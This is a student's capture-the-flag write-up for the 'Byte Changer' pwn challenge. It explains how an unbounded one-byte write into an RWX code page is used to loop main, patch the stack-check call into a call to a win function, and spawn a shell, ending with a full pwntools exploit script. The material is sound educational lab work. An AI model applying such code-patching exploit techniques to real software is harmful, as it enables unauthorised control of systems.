I’ve been tring to make a point to play ctf every weekend lately, as I want to try and level up my skills before I graduate next semester. In particular, I want to not shy so much away from pwn challenges. I really love pwn challenges, but the challs in most ctf’s I would play have previously been a bit outside of my skill level. I spent more time on pwn.college, both as part of my coursework and for fun, and felt like im at a point where I can push myself a bit in the category. There aren’t always big ctf’s to play, so I heard about a little 4 challenge flash ctf from a friend at the ASU Hacking Club and decided to play. This is not by any means a very difficult challenge, but I was happy to notice that it felt almost trivial, and a semester or two ago I think it would give me some trouble.

Byte Changer

Description

I like RWX, temporary.

Solution

Problem Analysis

I started by running the standard file and checksec on the binary to see what we were working with.

prob: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=68d315be2d691146fb2f93ba1f19515b793b861f, for GNU/Linux 3.2.0, not stripped

As we can see, we have a standard ELF 64-bit binary. Its dynamically linked and not stripped so reversing shouldn’t be too hard. I was a bit intimidated seeing full protections, but as we will see, they don’t really matter for our solution.

I cracked open the binary in Binary Ninja. It’s a tiny binary, and really only has two functions we care about. main, and win. I didn’t actually see the win function at first, and I’m really glad after I discovered my plan to hijack control flow I scrolled down in the functions list because it simplifies things quite a bit. Here is the decompilation of the main function.

int32_t main(int32_t argc, char** argv, char** envp)
{
    void* fsbase;
    int64_t rax = *(uint64_t*)((char*)fsbase + 0x28);
    setvbuf(stdin, nullptr, 2, 0);
    setvbuf(__bss_start, nullptr, 2, 0);
    setvbuf(stderr, nullptr, 2, 0);
    void (* var_18)() = _init;
    mprotect(_init, _init, 7);
    printf("change only 1 byte (idx): ");
    int64_t var_20;
    __isoc99_scanf("%lu", &var_20);
    printf("change to (val): ");
    char var_21;
    __isoc99_scanf("%hhu", &var_21);
    *(uint8_t*)((char*)var_18 + var_20) = var_21;
    *(uint64_t*)((char*)fsbase + 0x28);
    
    if (rax == *(uint64_t*)((char*)fsbase + 0x28))
        return 0;
    
    __stack_chk_fail();
    /* no return */
}

Here we see a few important things. The first big thing to notice is mprotect(_init, _init, 7);. This line sets the protections on the first page of the binaries address space to be RWX, so if we get some kind of controlled write, we can actually dynamically change the code of the binary.

The other thing is that the index we give is unbounded. So the challenge is pretty much allowing us to overwrite one byte of data anywhere we want. The crux of the challenge is that the value we provide is only going to be written as a single byte. This means we can’t just directly provide the index for the saved rip and overwrite it with the address of win.

Looping

Pretty quickly I decided a general plan of action. Since we can actually modify the code, the idea I had is to use our single byte write to force the code into an infinite loop, which would allow us to repeating the process of providing an index and writing a byte. From now on, I will call this theoretical byte the looping byte. Using the loop, I would overwrite the saved instruction pointer on the stack and then change the looping byte back to its original state so the main function would return, load the win function’s address into rip, and we would be done.

Now there is a flaw with this idea. The saved return address is stored on the stack. Our index allows us to write into the code segment of the running process. After realizing this I decided to look at the assembly for main so that I could plan a more detailed approach. Here is the critical segment, which is the end of main, starting from the instruction that writes our byte into the index of our choice:

0000130f  8802               mov     byte [rdx], al
00001311  b800000000         mov     eax, 0x0
00001316  488b55f8           mov     rdx, qword [rbp-0x8 {var_10}]
0000131a  64482b1425280000…  sub     rdx, qword [fs:0x28]
00001323  7405               je      0x132a

00001325  e876fdffff         call    __stack_chk_fail
{ Does not return }

0000132a  c9                 leave    {__saved_rbp}
0000132b  c3                 retn     {__return_addr}

Notice the call __stack_chk_fail. We could use our write to change this instruction to a call win instruction. Looking at this we can also plan out our “looping byte” which our whole strategy depends on. The je 0x132a can be change to je {some_other_place} and create a loop. On the left of the assembly we can see the actuall hex bytes as well as their address offsets, which is very helpfull since this is how we will actually be modifing the code.

The je instruction is using the opcode 74, which is a relative short jump. This means that it will take a one byte signed operand, in this case 05, and it means if we jump, the target location will be 5 bytes after the next instruction. Since the operand is signed, it means we can change it to jump up to 128 bytes backward from the next instruction. The next instruction is at 0x1325, so we can go as far back as 0x12a5. The nearest instruction after that is an instruction that is prepping the printf that prompts for the index byte in main. Now if we just jumped there, the program would probably segfault, since its expecting certain values to be in rax which will not be there. We actually don’t give a crap about the prompt though, we know it will be expecting data, so we can jump immidately after the printf where we have entire setup for the first scanf, which reads our index.

This address is 0x12b3. We need to find that relative to 0x1325, so we get 0x12b3-0x1325 = -0x72. We need to take the two’s compliment of 0x72, so the computer knows its a negative number. This makes our final operand byte 0x8e. We need just one more thing, and thats the index we are going to write this value too. We are going to be indexing into the first page of code, so we can use the last 3 nibbles of our addresses in the assembly to determine the index. At 0x1323 is the je instruction. The operand is the second byte, so it is at 0x1324. This means our index is 0x324.

With this I decided to start developing the python exploit script to make sure my theory would work. I started by setting up a function that takes an index and value, then uses pwntools to communicate with the program to make that write. Later I also added an argument that controls weather or not to look for the index prompt, since after we establish our loop, that prompt will no longer get printed. Here is the function:

def write_byte(idx, value, looping=False):
    if not looping: p.recvuntil(b'1 byte (idx): ')
    p.sendline(str(idx).encode())
    p.recvuntil(b'to (val): ')
    p.sendline(str(value).encode())

Now we can use this code to establish our loop.

# Setup looping for multiple writes
init_offset = 0x324
relative_jmp_arg = 0x8e
write_byte(init_offset, relative_jmp_arg)

So now when the program executes our write, it will hit the je, and since we haven’t corrupted the stack, it will jump back to taking another index and value, and repeat indefinitely.

Taking it home

So we’ve established a loop that will allow us to change as many code bytes as we desire. This means we just need to figure out how to modify the call __stack_chk_fail to be call win. Lets break down the instruction into its opcode and operand.

Opcode: e8 (call)
Operand: 76fdffff (0xfffffd76)

0xe8 is the opcode for a call instruction, which uses a relative offset to determine where to continue execution. The next 4 bytes are the 32-bit signed offset in little endian. This means that the operand number is 0xfffffd76. Since this is a signed value, the call is targeting an address before that of the next instruction. In this case, it goes to the address 0x28a backwards relative to the next instructions address, 0x132a. This is of course the stack check function. The win function is located at 0x11e9. So our operand needs to represent 0x11e9-0x132a = -0x141. To get negative 0x141, we take the two’s compliment in 32-bits, which gives us 0xfffffebf. This will be stored in memory as a little endian value, so we want to write the byte sequence bf fe ff ff to the operands location, which is 0x1326. In writing this up, I realize that the instruction already ends in ffff, so I really only needed to write 2 bytes here. My code just writes the full operand.

We use the p32() function from pwntools to convert the integer to a byte sequence. Then we loop over that byte sequence and call our write_byte() function over and over to place the operand.

# Write new call address to the code
new_call = p32(0xfffffebf)
base_addr = 0x326
i = 0
for b in new_call:
    write_byte(base_addr+i, b, looping=True)
    i += 1
    time.sleep(0.1)

You’ll notice a sleep here and there in my script. They are there because I was paranoid that if I sent the values too fast things would get read wrong. I don’t actually think they are necessary, but I never tried it without them.

Anyway, after successfully modifying the code to be a call win we now just need to redirect control flow to that instruction. It won’t get called naturally for a couple reasons. First off, we modified the je instruction to put us in an infinite loop. The original plan was to just change it back so that we ret from main and go to win. As discussed earlier though, we no longer are using the saved return address. If we put the code back to normal, since we aren’t going to clobber the stack canary and trigger __stack_chk_fail, our modified instruction would never get executed. Instead I used the same trick that established the loop in the first place, but instead of jumping backwards to create a loop, I set the operand to 0. This means that the jump will effectively do nothing, since it trys to jump 0 bytes forward. This will cause the very next instruction to execute, which is our modified call.

# Set loop to jump to our evil call
jmp_arg = 0
write_byte(init_offset, jmp_arg, looping=True)
p.interactive()

Here is the final python exploit:

from pwn import *
import time

p = process('./prob')
#p = remote('host1.dreamhack.games', 19396)

def write_byte(idx, value, looping=False):
    if not looping: p.recvuntil(b'1 byte (idx): ')
    p.sendline(str(idx).encode())
    p.recvuntil(b'to (val): ')
    #input(f'{p.pid}')
    p.sendline(str(value).encode())

# Setup looping for multiple writes
init_offset = 0x324
relative_jmp_arg = 0x8e
write_byte(init_offset, relative_jmp_arg)
time.sleep(0.5)

# Write new call address to the code
new_call = p32(0xfffffebf)
base_addr = 0x326
i = 0
for b in new_call:
    write_byte(base_addr+i, b, looping=True)
    i += 1
    time.sleep(0.1)

# Set loop to jump to our evil call
jmp_arg = 0
write_byte(init_offset, jmp_arg, looping=True)

p.interactive()

I ran this and to my surprise, first try I popped the shell locally. Running it on the remote server it worked just the same. From there its as easy as cat flag.